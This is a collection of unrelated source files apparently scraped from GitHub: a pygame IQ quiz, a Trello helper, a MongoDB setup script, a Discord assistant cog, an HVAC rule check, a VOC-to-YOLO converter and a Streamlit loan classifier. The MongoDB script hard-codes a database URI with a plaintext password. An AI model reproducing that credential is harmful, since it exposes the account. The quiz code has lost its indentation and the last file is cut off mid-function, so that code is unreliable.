for y in range(len(answers)):
#Puts answer from list in string
answer = "{0}) {1}".format(y+1, answers[y])
#If loops to correct answer of question then button created with correct answer
if (y+1) == correct:
button((width/2)-150, (height/3)-25+y*100, 300, 50, answer, (width/2), (height/3)+y*100, 30, "c")
#Else wrong button created with wrong answers
else:
button((width/2)-150, (height/3)-25+y*100, 300, 50, answer, (width/2), (height/3)+y*100, 30, "w")
#Updates display
pygame.display.update()
#Out of time function
def time_out():
'''Tells user they have run out of time'''
#Sets boolean value to true for loop
time = True
while time:
for event in pygame.event.get():
#Quits game if "X" pressed
if event.type == pygame.QUIT:
pygame.quit()
quit()
#Screen filled with white
screen.fill(white)
#Puts message in string
message = "You ran out of time"
#Displays message at top of window size 100
display_text(message, (width/2), (height/5), 100)
#Creates menu button allows you to go back to menu and restart
button((width/2)-100, (height/2)-25, 200, 50, "Menu", (width/2), (height/2), 30, "m")
#Updates display
pygame.display.update()
#User name function
def user_name():
'''Asks for users name'''
#Creates empty string
string = ""
#Question to be used put in string
name_ques = "What is your name?"
error = "You need to enter a name."
#Error false
is_error = False
user_input = True
while user_input:
for event in pygame.event.get():
#Quits if "X" is pressed
if event.type == pygame.QUIT:
pygame.quit()
quit()
#Checks if key has been pressed
elif event.type == KEYDOWN:
#Checks if key unicode was a letter
if event.unicode.isalpha():
#Adds letter to string
string += event.unicode
#Checks if key was a backspace
elif event.key == K_BACKSPACE:
#Takes last letter from string
string = string[:-1]
#Checks if enter key is pressed
elif event.key == K_RETURN:
#Checks if string is still empty when enter key pressed
if string == "":
#Error true
is_error = True
else:
#Else return string
return string
#Screen filled white
screen.fill(white)
#If error true displays error message
if is_error:
display_text(error, (width/2), ((3*height)/4), 60)
#Displays question asking user to enter name
display_text(name_ques, (width/2), (height/4), 75)
#Displays name as its being typed
display_text(string, (width/2), (height/2), 50)
#Updates display
pygame.display.update()
#Updates high scores
def update_high_scores(iq, time):
'''Adds the new score along with time taken'''
#Calls user name function and returns name
name = user_name()
#Creates list with name, iq and time taken
high_score = [name, iq, time]
#High scores file opened for appending to
high_file = open_file("high_scores.dat", "ab")
#list pickled to file
pickle.dump(high_score, high_file)
#file closed
high_file.close()
#Returns name
return name
#High scores function
def high_scores():
'''Displays High Scores screen'''
#Creates empty list for high scores
high_scores = []
#Opens file for reading
high_file = open_file("high_scores.dat", "rb")
#Loops through file until empty line
try:
while True:
#reads line
high_line = pickle.load(high_file)
#Appends line to list
high_scores.append(high_line)
except EOFError:
pass
#Closes file
high_file.close()
#Sorts list first in decreasing order of score then increasing order of time
high_scores.sort(key=lambda x: (int(-(x[1])),x[2]))
#Message in string
score_message = "The top 10 high scores are:"
high_score = True
while high_score:
for event in pygame.event.get():
#Quits game if "X" pressed
if event.type == pygame.QUIT:
pygame.quit()
quit()
#Screened filled white
screen.fill(white)
#Buttons to pause/play music
button(((9*width)/10)-200, ((9*height)/10)-25, 100, 50, "Pause", ((9*width)/10)-150, ((9*height)/10), 30, "pa")
button(((9*width)/10)-50, ((9*height)/10)-25, 100, 50, "Play", ((9*width)/10), ((9*height)/10), 30, "pl")
#Displays message
display_text(score_message, (width/2), (height/8), 50)
#If list longer or equal to 10 scores then only first 10 displayed
if len(high_scores) >= 10:
for i in range(10):
score = "{0}. {1} - {2} - {3} seconds".format(i+1, high_scores[i][0], high_scores[i][1], high_scores[i][2])
display_text(score, (width/2), (height/4)+i*35, 30)
#If less than ten but still 1 or more then only that amount is displayed
elif 1 <= len(high_scores) < 10:
for i in range(len(high_scores)):
score = "{0}. {1} - {2} - {3} seconds".format(i+1, high_scores[i][0], high_scores[i][1], high_scores[i][2])
display_text(score, (width/2), (height/4)+i*35, 30)
#Otherwise "None" is displayed
else:
display_text("None", (width/2), (height/4), 30)
#Creates back and quit buttons
button((width/4)-100, (height/2)-25, 200, 50, "Back", (width/4), (height/2), 30, "m")
button(((3*width)/4)-100, (height/2)-25, 200, 50, "Quit", ((3*width)/4), (height/2), 30, "q")
#Updates display
pygame.display.update()
#quiz
def quiz():
'''Main function controlling quiz'''
#Declare as global variable
global num_ques
#First 5 questions are maths based
if num_ques < 5:
#Adding one to number of questions
num_ques = num_ques + 1
#Displays maths question with answers
maths_question()
#Rest are text based with different sections 5 questions long
elif 5 <= num_ques < 10:
#General knowledge questions
iq_file = open_file("general knowledge.txt", "r")
num_ques = num_ques + 1
#Display a text question with answers
text_question(iq_file)
elif 10 <= num_ques < 15:
#Music questions
iq_file = open_file("music.txt", "r")
num_ques = num_ques + 1
text_question(iq_file)
elif 15 <= num_ques < 20:
#Movie questions
iq_file = open_file("movies.txt", "r")
num_ques = num_ques + 1
text_question(iq_file)
elif 20 <= num_ques < 25:
#Geography questions
iq_file = open_file("geography.txt", "r")
num_ques = num_ques + 1
text_question(iq_file)
elif 25 <= num_ques < 30:
#Language questions
iq_file = open_file("language.txt", "r")
num_ques = num_ques + 1
text_question(iq_file)
#Else the quiz has finished
else:
#Converts score to IQ
global overall_score
iq = int(overall_score*(2/3))
#Resets score for next time
overall_score = 0
#Works out time taken to complete test
global time_left
time_left = int(time_left)
time = 200-time_left
#Adds name, score and time to file and returns name
name = update_high_scores(iq, time)
#Resets number of questions
num_ques = 0
quiz = True
while quiz:
for event in pygame.event.get():
#Quits if "X" is pressed
if event.type == pygame.QUIT:
pygame.quit()
quit()
#Screen filled with white
screen.fill(white)
#Buttons to pause/play music
button(((9*width)/10)-200, ((9*height)/10)-25, 100, 50, "Pause", ((9*width)/10)-150, ((9*height)/10), 30, "pa")
button(((9*width)/10)-50, ((9*height)/10)-25, 100, 50, "Play", ((9*width)/10), ((9*height)/10), 30, "pl")
#Score, time and play again message to inform user of their achievements
score_message = "Congratulations {0}! You got an IQ of {1}!".format(name,iq)
time_message = "And did it in a time of {0} seconds!".format(time)
play_again = "What would you like to do?"
#Displays score, time and play again messages
display_text(score_message, (width/2), (height/6), 50)
display_text(time_message, (width/2), (height/6)+75, 50)
display_text(play_again, (width/2), (height/3)+100, 40)
#Displays buttons to retake test, go to main menu and quit
button((width/4)-100, ((2*height)/3)-25, 200, 50, "Retake Test", (width/4), ((2*height)/3), 30, "s")
button((width/2)-100, ((2*height)/3)-25, 200, 50, "Main Menu", (width/2), ((2*height)/3), 30, "m")
button(((3*width)/4)-100, ((2*height)/3)-25, 200, 50, "Quit", ((3*width)/4), ((2*height)/3), 30, "q")
#Updates display
pygame.display.update()
#menu
def menu():
menu = True
while menu:
for event in pygame.event.get():
#Quits if "X" pressed
if event.type == pygame.QUIT:
pygame.quit()
quit()
#Screen filled white
screen.fill(white)
#Displays title for menu
display_text("IQ Test", (width/2), (height/6), 100)
#Buttons for pause/play music
button(((9*width)/10)-200, ((9*height)/10)-25, 100, 50, "Pause", ((9*width)/10)-150, ((9*height)/10), 30, "pa")
button(((9*width)/10)-50, ((9*height)/10)-25, 100, 50, "Play", ((9*width)/10), ((9*height)/10), 30, "pl")
#Buttons for Start, High Scores and Quit
button((width/2)-100, height/3, 200, 50, "Start", (width/2), (height/3)+25, 30, "s")
button((width/2)-100, (height/3)+100, 200, 50, "High Scores", (width/2), (height/3)+125, 30, "hs")
button((width/2)-100, (height/3)+200, 200, 50, "Quit", (width/2), (height/3)+225, 30, "q")
#Updates display
pygame.display.update()
#Start program
menu()
| SadRavioli/Portfolio | Python/Python Project 1st Year/IQ Test.py | IQ Test.py | py | 22,848 | python | en | code | 0 | github-code | 13 |
33141206324 | """Trello lists services."""
# Python Libraries
import requests
# Services
from spacex_api.utils.services.trello.base import get_needed_data, perform_request
def get_lists(user=None, board_id=None):
"""Get boards
---
Make a list with all the trello boards.
"""
url = f"https://api.trello.com/1/boards/{board_id}/lists"
response = perform_request(
method="GET",
url=url,
user=user
)
print(f"Get lists status: {response.status_code}")
board_lists = list(map(get_needed_data, response.json()))
return board_lists | SantiR38/trello-api | spacex_api/utils/services/trello/lists.py | lists.py | py | 576 | python | en | code | 0 | github-code | 13 |
27918555273 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
if __name__ == "__main__":
num = 10
if (len(sys.argv) > 1):
num = int(sys.argv[1])
print(num)
for i in range(1, num):
os.system("./chatClient/chatClient/client.o " + str(i) + "熊") | leonlyo/ManyPeopleChat | createClient.py | createClient.py | py | 264 | python | en | code | 0 | github-code | 13 |
5034773602 | from pymongo import MongoClient
import certifi
from uuid import uuid4
def get_connection():
ca = certifi.where()
# password : ias-iot-avishkar-23
client = MongoClient("mongodb+srv://hkashyap0809:ias-iot-avishkar-23@sensor-cluster.jzrhdzp.mongodb.net/?retryWrites=true&w=majority",tlsCAFile=ca)
return client
def create_schema(db,sensor_type):
collection = db.create_collection(sensor_type)
schema = {
'$jsonSchema': {
'bsonType': 'object',
'required': ['nodename', 'sensor_data','timestamp','occupancy_state'],
'properties': {
'id':{
'bsonType': 'string',
'description': 'must be a string and is required'
},
'nodename': {
'bsonType': 'string',
'description': 'must be a string and is required'
},
'sensor_data': {
'bsonType': 'string',
'description': 'must be a string and is required'
},
'timestamp': {
'bsonType': 'string',
'description': 'must be a string and is required'
},
'occupancy_state': {
'bsonType': 'string',
'description': 'must be a string and is required'
}
}
}
}
collection.create_index([('id', 1)], unique=True)
collection.create_index([('nodename', 1)])
collection.create_index([('timestamp', 1)])
collection.create_index(schema)
# Set up a connection to MongoDB Atlas
# Connect to a database in MongoDB Atlas
client = get_connection()
db_name = 'sensor-database'
db = client[db_name]
# create_schema(db,'temperature')
# collection = db['temperature']
# doc = [{"id": str(uuid4()), "nodename": "h105", "sensor_data": 234,"timestamp":"3453","occupancy_state":"0"},
# {"id": str(uuid4()), "nodename": "h205", "sensor_data": 4,"timestamp":"345345","occupancy_state":"0"},
# {"id": str(uuid4()), "nodename": "obh", "sensor_data": 756,"timestamp":"345345","occupancy_state":"0"},]
# collection.insert_many(doc) | hkashyap0809/IAS-IOT-AVISHKAR-23 | SensorManagerOld/create-mongo-schema.py | create-mongo-schema.py | py | 2,121 | python | en | code | 0 | github-code | 13 |
17938668726 | import asyncio
import logging
from io import BytesIO
import discord
from redbot.core import commands
from redbot.core.i18n import Translator, cog_i18n
from redbot.core.utils.chat_formatting import box, escape, pagify
from ..abc import MixinMeta
from ..common.calls import request_model
from ..common.constants import READ_EXTENSIONS
from ..common.utils import can_use
log = logging.getLogger("red.vrt.assistant.base")
_ = Translator("Assistant", __file__)
@cog_i18n(_)
class Base(MixinMeta):
@commands.command(name="chathelp")
async def chat_help(self, ctx: commands.Context):
"""Get help using assistant"""
txt = (
_(
"""
# How to Use
### Commands
`[p]convostats` - view your conversation message count/token usage for that convo.
`[p]clearconvo` - reset your conversation for the current channel/thread/forum.
`[p]showconvo` - get a json dump of your current conversation (this is mostly for debugging)
`[p]chat` or `[p]ask` - command prefix for chatting with the bot outside of the live chat, or just @ it.
### Chat Arguments
`[p]chat --last` - resend the last message of the conversation.
`[p]chat --extract` - extract all markdown text to be sent as a separate message.
`[p]chat --outputfile <filename>` - sends the reply as a file instead.
### Argument Use-Cases
`[p]chat --last --outpufile test.py` - output the last message the bot sent as a file.
`[p]chat write a python script to do X... --extract --outputfile test.py` - all code blocks from the output will be sent as a file in addition to the reply.
`[p]chat --last --extract --outputfile test.py` - extract code blocks from the last message to send as a file.
### File Comprehension
Files may be uploaded with the chat command to be included with the question or query, so rather than pasting snippets, the entire file can be uploaded so that you can ask a question about it.
At the moment the bot is capable of reading the following file extensions.
```json
{}
```
If a file has no extension it will still try to read it only if it can be decoded to utf-8.
### Tips
- Replying to someone else's message while using the `[p]chat` command will include their message in *your* conversation, useful if someone says something helpful and you want to include it in your current convo with GPT.
- Replying to a message with a file attachment will have that file be read and included in your conversation. Useful if you upload a file and forget to use the chat command with it, or if someone else uploads a file you want to query the bot with.
- Conversations are *Per* user *Per* channel, so each channel you interact with GPT in is a different convo.
- Talking to the bot like a person rather than a search engine generally yields better results. The more verbose you can be, the better.
- Conversations are persistent, if you want the bot to forget the convo so far, use the `[p]clearconvo` command
"""
)
.replace("[p]", ctx.clean_prefix)
.format(", ".join(READ_EXTENSIONS))
)
embed = discord.Embed(description=txt.strip(), color=ctx.me.color)
await ctx.send(embed=embed)
@commands.command(
name="chat",
aliases=[
"ask",
"escribir",
"razgovor",
"discuter",
"plaudern",
"채팅",
"charlar",
"baterpapo",
"sohbet",
],
)
@commands.guild_only()
@commands.cooldown(1, 6, commands.BucketType.user)
async def ask_question(self, ctx: commands.Context, *, question: str):
"""
Chat with [botname]!
Conversations are *Per* user *Per* channel, meaning a conversation you have in one channel will be kept in memory separately from another conversation in a separate channel
**Optional Arguments**
`--outputfile <filename>` - uploads a file with the reply instead (no spaces)
`--extract` - extracts code blocks from the reply
**Example**
`[p]chat write a python script that prints "Hello World!"`
- Including `--outputfile hello.py` will output a file containing the whole response.
- Including `--outputfile hello.py --extract` will output a file containing just the code blocks and send the rest as text.
- Including `--extract` will send the code separately from the reply
"""
conf = self.db.get_conf(ctx.guild)
if not await self.can_call_llm(conf, ctx):
return
if not await can_use(ctx.message, conf.blacklist):
return
async with ctx.typing():
await self.handle_message(ctx.message, question, conf)
@commands.command(name="convostats")
@commands.guild_only()
async def show_convo_stats(self, ctx: commands.Context, *, user: discord.Member = None):
"""
Check the token and message count of yourself or another user's conversation for this channel
Conversations are *Per* user *Per* channel, meaning a conversation you have in one channel will be kept in memory separately from another conversation in a separate channel
Conversations are only stored in memory until the bot restarts or the cog reloads
"""
if not user:
user = ctx.author
conf = self.db.get_conf(ctx.guild)
conversation = self.db.get_conversation(user.id, ctx.channel.id, ctx.guild.id)
messages = len(conversation.messages)
max_tokens = self.get_max_tokens(conf, ctx.author)
def generate_color(index: int, limit: int):
if not limit:
return (0, 0)
if index > limit:
return (0, 0)
# RGB for white is (255, 255, 255) and for red is (255, 0, 0)
# As we progress from white to red, we need to decrease the values of green and blue from 255 to 0
# Calculate the decrement in green and blue values
decrement = int((255 / limit) * index)
# Calculate the new green and blue values
green = blue = 255 - decrement
# Return the new RGB color
return (green, blue)
convo_tokens = await self.convo_token_count(conf, conversation)
g, b = generate_color(messages, conf.get_user_max_retention(ctx.author))
gg, bb = generate_color(convo_tokens, max_tokens)
# Whatever limit is more severe get that color
color = discord.Color.from_rgb(255, min(g, gg), min(b, bb))
model = conf.get_user_model(ctx.author)
if not conf.api_key and (conf.endpoint_override or self.db.endpoint_override):
endpoint = conf.endpoint_override or self.db.endpoint_override
try:
res = await request_model(f"{endpoint}/model")
model = res["model"]
except Exception as e: # Could be any issue, don't worry about it here
log.warning(_("Could not fetch external model"), exc_info=e)
pass
desc = (
ctx.channel.mention
+ "\n"
+ _("`Messages: `{}/{}\n`Tokens: `{}/{}\n`Expired: `{}\n`Model: `{}").format(
messages,
conf.get_user_max_retention(ctx.author),
convo_tokens,
max_tokens,
conversation.is_expired(conf, ctx.author),
model,
)
)
embed = discord.Embed(
description=desc,
color=color,
)
embed.set_author(
name=_("Conversation stats for {}").format(user.display_name),
icon_url=user.display_avatar,
)
embed.set_footer(
text=_("Token limit is a soft cap and excess is trimmed before sending to the api")
)
await ctx.send(embed=embed)
@commands.command(name="clearconvo")
@commands.guild_only()
async def clear_convo(self, ctx: commands.Context):
"""
Reset your conversation with the bot
This will clear all message history between you and the bot for this channel
"""
conversation = self.db.get_conversation(ctx.author.id, ctx.channel.id, ctx.guild.id)
conversation.reset()
await ctx.send(_("Your conversation in this channel has been reset!"))
@commands.command(name="query")
@commands.bot_has_permissions(embed_links=True)
async def test_embedding_response(self, ctx: commands.Context, *, query: str):
"""
Fetch related embeddings according to the current settings along with their scores
You can use this to fine-tune the minimum relatedness for your assistant
"""
conf = self.db.get_conf(ctx.guild)
if not conf.embeddings:
return await ctx.send(_("You do not have any embeddings configured!"))
if not conf.top_n:
return await ctx.send(_("Top N is set to 0 so no embeddings will be returned"))
if not await self.can_call_llm(conf, ctx):
return
async with ctx.typing():
query_embedding = await self.request_embedding(query, conf)
if not query_embedding:
return await ctx.send(_("Failed to get embedding for your query"))
embeddings = await asyncio.to_thread(conf.get_related_embeddings, query_embedding)
if not embeddings:
return await ctx.send(
_("No embeddings could be related to this query with the current settings")
)
for name, em, score, dimension in embeddings:
for p in pagify(em, page_length=4000):
txt = (
_("`Entry Name: `{}\n").format(name)
+ _("`Relatedness: `{}\n").format(round(score, 4))
+ _("`Dimensions: `{}\n").format(dimension)
)
escaped = escape(p)
boxed = box(escaped)
txt += boxed
embed = discord.Embed(description=txt)
await ctx.send(embed=embed)
@commands.command(name="showconvo")
@commands.guild_only()
@commands.guildowner()
async def show_convo(self, ctx: commands.Context, *, user: discord.Member = None):
"""
View the current transcript of a conversation
This is mainly here for moderation purposes
"""
if not user:
user = ctx.author
conversation = self.db.get_conversation(user.id, ctx.channel.id, ctx.guild.id)
if not conversation.messages:
return await ctx.send(_("You have no conversation in this channel!"))
text = ""
for message in conversation.messages:
role = message["role"]
content = message["content"]
text += f"{role}: {content}\n"
buffer = BytesIO(text.encode())
buffer.name = f"{ctx.author.name}_transcript.txt"
buffer.seek(0)
file = discord.File(buffer)
await ctx.send(_("Here is your conversation transcript!"), file=file)
| vertyco/vrt-cogs | assistant/commands/base.py | base.py | py | 11,142 | python | en | code | 33 | github-code | 13 |
34785484858 | from rct229.rulesets.ashrae9012019.data.schema_enums import schema_enums
from rct229.utils.jsonpath_utils import find_one
from rct229.utils.utility_functions import find_exactly_one_hvac_system
HEATING_SYSTEM = schema_enums["HeatingSystemOptions"]
def is_hvac_sys_preheating_type_fluid_loop(rmi_b, hvac_b_id):
"""Returns TRUE if the HVAC system preheating system heating type is fluid loop. Returns FALSE if the HVAC system
preheating system has anything other than fluid loop.
Parameters
----------
rmi_b : json
RMD at RuleSetModelInstance level
hvac_b_id : str
The HVAC system ID.
Returns
-------
bool
True: HVAC system preheating system has fluid loop as the heating type
False: otherwise
"""
# Get the hvac system
hvac_b = find_exactly_one_hvac_system(rmi_b, hvac_b_id)
# get preheat system from the HVAC
preheat_system = hvac_b.get("preheat_system")
is_hvac_sys_preheating_type_fluid_loop_flag = (
preheat_system is not None
and preheat_system.get("hot_water_loop") is not None
# Silence fail if heating system type data is not in RMD
and find_one("type", preheat_system) == HEATING_SYSTEM.FLUID_LOOP
)
return is_hvac_sys_preheating_type_fluid_loop_flag
| pnnl/ruleset-checking-tool | rct229/rulesets/ashrae9012019/ruleset_functions/baseline_systems/baseline_hvac_sub_functions/is_hvac_sys_preheating_type_fluid_loop.py | is_hvac_sys_preheating_type_fluid_loop.py | py | 1,297 | python | en | code | 6 | github-code | 13 |
18954514941 | import requests
import time
def download_link(url:str) -> None:
result = requests.get(url).content
print(f'Read {len(result)} from {url}')
def download_all(urls:list) -> None:
for url in urls:
download_link(url)
url_list = ["https://www.google.com/","https://www.bing.com"]*50
start = time.time()
download_all(url_list)
end = time.time()
print(f'download {len(url_list)} links in {end - start} seconds') | omid29sarei/python_request_performance_test | send_http_reqs_sync.py | send_http_reqs_sync.py | py | 433 | python | en | code | 0 | github-code | 13 |
33527904676 | import xml.etree.ElementTree as ET
import pickle
import os
from os import listdir, getcwd
from os.path import join
def convert(size, box):
x_center = (box[0] + box[1]) / 2.0
y_center = (box[2] + box[3]) / 2.0
x = x_center / size[0]
y = y_center / size[1]
w = (box[1] - box[0]) / size[0]
h = (box[3] - box[2]) / size[1]
return (x, y, w, h)
def convert_annotation(xml_files_path, save_txt_files_path, classes):
xml_files = os.listdir(xml_files_path)
print(xml_files)
for xml_name in xml_files:
print(xml_name)
xml_file = os.path.join(xml_files_path, xml_name)
out_txt_path = os.path.join(save_txt_files_path, xml_name.split('.')[0] + '.txt')
out_txt_f = open(out_txt_path, 'w')
tree = ET.parse(xml_file)
root = tree.getroot()
size = root.find('size')
w = int(size.find('width').text)
h = int(size.find('height').text)
for obj in root.iter('object'):
difficult = obj.find('difficult').text
cls = obj.find('name').text
if cls not in classes or int(difficult) == 1:
continue
cls_id = classes.index(cls)
xmlbox = obj.find('bndbox')
b = (float(xmlbox.find('xmin').text), float(xmlbox.find('xmax').text), float(xmlbox.find('ymin').text),
float(xmlbox.find('ymax').text))
# b=(xmin, xmax, ymin, ymax)
print(w, h, b)
bb = convert((w, h), b)
out_txt_f.write(str(cls_id) + " " + " ".join([str(a) for a in bb]) + '\n')
if __name__ == "__main__":
# 需要转换的类别,需要一一对应
# classes1 = ['ganlanhui',
# 'huanyinghui',
# 'huimohei',
# 'jiguanglv',
# 'kejihui',
# 'laiyinlan',
# 'luolanzi',
# 'xinkaqibai',
# 'xintanjinghei',
# 'xueshihong',
# 'yizeyin',
# '360',
# 'haiyanhui',
# 'nasidakayin',
# 'shenyelan',
# 'ganlanhui2']
# classes1 = ['huanyuhui', 'kejihui', 'lanhualan', 'qingmeilv', 'songmohei', 'xingtubai',
# 'huanyuhui_black', 'kejihui_black', 'lanhualan_black', 'qingmeilv_black', 'songmohei_black', 'xingtubai_black','360']
# classes1 = ['404000599AA', '404000664AA', '404000696AA', '404000847AA', 'heibai', 'heihong',
# 'error']
classes1 = ['404000599AA', '404000664AA', '404000696AA/', '404000847AA','error']
# classes1 = ['404000062AA',
# '404000137AA',
# '404000184AA',
# '404000190AA',
# '404000217AA',
# '404000258AA',
# '404000385AA',
# '404000476AA',
# '404000478AA',
# '404000479AA',
# '404000498AA',
# '404000500AA',
# '404000637AABBK',
# '404000638AAABK',
# '404000719AA',
# '404000745AA']
# classes1 = ['fxp1', 'fxp2','fxp3','fxp4','fxp5','fxp6','fxp7','fxp8']
# classes1 = ['T18_jiguanglv',
# 'T18_kejihui',
# 'T18_xinkaqibai',
# 'T18_xintanjinghei',
# 'T1AD_hawanahui',
# 'T1AD_huanyinghui',
# 'T1AD_jiguanglv',
# 'T1AD_kejihui',
# 'T1AD_laiyinlan',
# 'T1AD_luolanzi',
# 'T1AD_nasidakeyin',
# 'T1AD_shenyelan',
# 'T1AD_xinkaqibai',
# 'T1AD_xintanjinghei',
# 'T1AD_xueshihong',
# 'T26_ganlanhui_bai',
# 'T26_ganlanhui_hei',
# 'T26_haiyanhui_bai',
# 'T26_haiyanhui_hei',
# 'T26_xinkaqibai_bai',
# 'T26_xinkaqibai_hei',
# 'T26_xintanjinghei_bai',
# 'T26_xintanjinghei_hei',
# 'T26_yizeyin_bai',
# 'T26_yizeyin_hei','360','arabic']
classes1 = ['cebiao_1', 'cebiao_2', 'cebiao2_1', 'cebiao2_2', 'cebiao3_1', 'cebiao3_2',
'wsb_tanjinghei_1', 'wsb_tanjinghei_2', 'wsb_kaqibai_1', 'wsb_kaqibai_2',
'wsb_kejihui_1', 'wsb_kejihui_2', 'wsb_tanjinghei2_1', 'wsb_tanjinghei2_2',
'wsb_kaqibai2_1', 'wsb_kaqibai2_2', 'wsb_kejihui2_1', 'wsb_kejihui2_2',
'wsb_ganlanhui_1', 'wsb_ganlanhui_2', 'wsb_yizeyin_1', 'wsb_yizeyin_2',
'wsb_haiyanhui_1', 'wsb_haiyanhui_2', 'wsb_hei_1', 'wsb_hei_2', 'wsb_bai_1',
'wsb_bai_2', 'wsb_tanjinghei3_1', 'wsb_tanjinghei3_2', 'wsb_kaqibai3_1',
'wsb_kaqibai3_2', 'wsb_laiyinlan_1', 'wsb_laiyinlan_2', 'wsb_huanyinghui_1',
'wsb_huanyinghui_2', 'wsb_luolanzi_1', 'wsb_luolanzi_2', 'wsb_xueshihong_1',
'wsb_xueshihong_2', 'wsb_nasidakeyin_1', 'wsb_nasidakeyin_2', 'wsb_jiguanglv_1',
'wsb_jiguanglv_2', 'shenyelan_1', 'shenyelan_2', 'wsb_jiguanglv2_1',
'wsb_jiguanglv2_2', 'wsb_kejihui3_1', 'wsb_kejihui3_2', 'cebiao4',
'wsb_jiguanglv3_1', 'wsb_jiguanglv3_2','dangshui', 'dangshui2', 'dangshui3']
# 2、voc格式的xml标签文件路径
xml_files1 = r'D:\xzy\pycharm-workspace\yolov5-6.0\data\230627_chaoyi_dangshui\0627finall\labels_xml\val'
# 3、转化为yolo格式的txt标签文件存储路径
save_txt_files1 = r'D:\xzy\pycharm-workspace\yolov5-6.0\data\230627_chaoyi_dangshui\0627finall\labels\val'
convert_annotation(xml_files1, save_txt_files1, classes1) | xzyxiaohaha/PythonUtil | pythonUtil/数据集操作工具类/voc_to_yolo.py | voc_to_yolo.py | py | 4,741 | python | en | code | 0 | github-code | 13 |
43082351496 | import streamlit as st
import pandas as pd
import numpy as np
from sklearn.svm import SVC
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.tree import DecisionTreeClassifier
from xgboost import XGBClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.metrics import plot_confusion_matrix, plot_roc_curve, plot_precision_recall_curve
from sklearn.metrics import precision_score, recall_score
import os
def write():
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# front end elements of the web page
html_temp = """
<div style ="background-color:#F63366;padding:15px;margin:15px">
<h2 style ="text-align:center;">Model Training For Loan Approval </h2>
</div>
"""
# display the front end aspect
st.markdown(html_temp, unsafe_allow_html=True)
@st.cache(persist=True)
def load_data():
data = pd.read_csv((os.path.join(BASE_DIR, "bankloan.csv")))
data = data.drop('Loan_ID', axis=1)
# Handle Missing Values
data.Credit_History.fillna(np.random.randint(0, 2), inplace=True)
data.Married.fillna(np.random.randint(0, 2), inplace=True)
data.LoanAmount.fillna(data.LoanAmount.median(), inplace=True)
data.Loan_Amount_Term.fillna(
data.Loan_Amount_Term.mean(), inplace=True)
data.Gender.fillna(np.random.randint(0, 2), inplace=True)
data.Dependents.fillna(data.Dependents.median(), inplace=True)
data.Self_Employed.fillna(np.random.randint(0, 2), inplace=True)
return data
@st.cache(persist=True)
def split(df):
pre_x = df.iloc[:, :-1]
pre_y = df.iloc[0:, -1]
# Handle Label Data
x = pd.get_dummies(pre_x)
y = pre_y.map(dict(Y=1, N=0))
x_train, x_test, y_train, y_test = train_test_split(
x, y, test_size=0.3, random_state=10)
return x_train, x_test, y_train, y_test
def plot_metrics(metrics_list):
if 'Confusion Matrix' in metrics_list:
st.subheader("Confusion Matrix")
plot_confusion_matrix(model, x_test, y_test,
display_labels=class_names)
st.pyplot()
if 'ROC Curve' in metrics_list:
st.subheader("ROC Curve")
plot_roc_curve(model, x_test, y_test)
st.pyplot()
if 'Precision-Recall Curve' in metrics_list:
st.subheader('Precision-Recall Curve')
plot_precision_recall_curve(model, x_test, y_test)
st.pyplot()
df = load_data()
class_names = ["Approved", 'Rejected']
x_train, x_test, y_train, y_test = split(df)
st.sidebar.subheader("Choose Classifier")
classifier = st.sidebar.selectbox("Classifier",
("XGBClassifier", "Support Vector Machine (SVM)", "Logistic Regression", "Random Forest", "GradientBoostingClassifier",
"K-Nearest Neighbor", "Decision Tree", "Neural Network"))
if classifier == 'XGBClassifier':
st.sidebar.subheader("Hyperparameters Tuning")
learning_rate = st.sidebar.number_input("learning_rate", 0.05, 0.3, step=.05,
key='learning_rate')
min_child_weigh = st.sidebar.number_input("min_child_weigh", 1, 7, step=1,
key='min_child_weigh')
gamma = st.sidebar.number_input("gamma", 0.0, 0.4, step=0.1,
key='gamma')
colsample_bytree = st.sidebar.number_input("colsample_bytree", 0.3, 0.7, step=0.1,
key='colsample_bytree')
n_estimators = st.sidebar.number_input("n_estimators", 100, 5000, step=10,
key='n_estimators')
max_depth = st.sidebar.number_input(
"The maximum depth of the tree", 3, 10, step=1, key='max_depth')
metrics = st.multiselect("What metrics to plot?",
('Confusion Matrix', 'ROC Curve',
'Precision-Recall Curve'))
if st.button("Classify", key='classify'):
st.success("XGBClassifier Results")
model = XGBClassifier(learning_rate=learning_rate, min_child_weigh=min_child_weigh, gamma=gamma,
n_estimators=n_estimators, max_depth=max_depth, colsample_bytree=colsample_bytree)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
y_pred = model.predict(x_test)
st.write("Accuracy: ", accuracy.round(2))
st.write("Precision: ", precision_score(
y_test, y_pred, labels=class_names).round(2))
st.write("Recall: ", recall_score(
y_test, y_pred, labels=class_names).round(2))
plot_metrics(metrics)
if classifier == 'Support Vector Machine (SVM)':
st.sidebar.subheader("Hyperparameters Tuning")
# choose parameters
C = st.sidebar.number_input("C (Regularization parameter)",
0.01, 10.0, step=0.01, key='C_SVM')
kernel = st.sidebar.radio("Kernel", ("rbf", "linear"), key='kernel')
gamma = st.sidebar.radio(
"Gamma (Kernel Coefficient)", ("scale", "auto"), key='gamma')
metrics = st.multiselect("What metrics to plot?",
('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
if st.button("Classify", key='classify'):
st.success("Support Vector Machine (SVM) Results")
model = SVC(C=C, kernel=kernel, gamma=gamma)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
y_pred = model.predict(x_test)
st.write("Accuracy: ", accuracy.round(2))
st.write("Precision: ", precision_score(
y_test, y_pred, labels=class_names).round(2))
st.write("Recall: ", recall_score(
y_test, y_pred, labels=class_names).round(2))
plot_metrics(metrics)
if classifier == 'Logistic Regression':
st.sidebar.subheader("Hyperparameters Tuning")
C = st.sidebar.number_input(
"C (Regularization parameter)", 0.01, 10.0, step=0.01, key='C_LR')
max_iter = st.sidebar.slider(
"Maximum number of iterations", 100, 500, key='max_iter')
metrics = st.multiselect("What metrics to plot?",
('Confusion Matrix', 'ROC Curve', 'Precision-Recall Curve'))
if st.button("Classify", key='classify'):
st.success("Logistic Regression Results")
model = LogisticRegression(C=C, penalty='l2', max_iter=max_iter)
model.fit(x_train, y_train)
accuracy = model.score(x_test, y_test)
y_pred = model.predict(x_test)
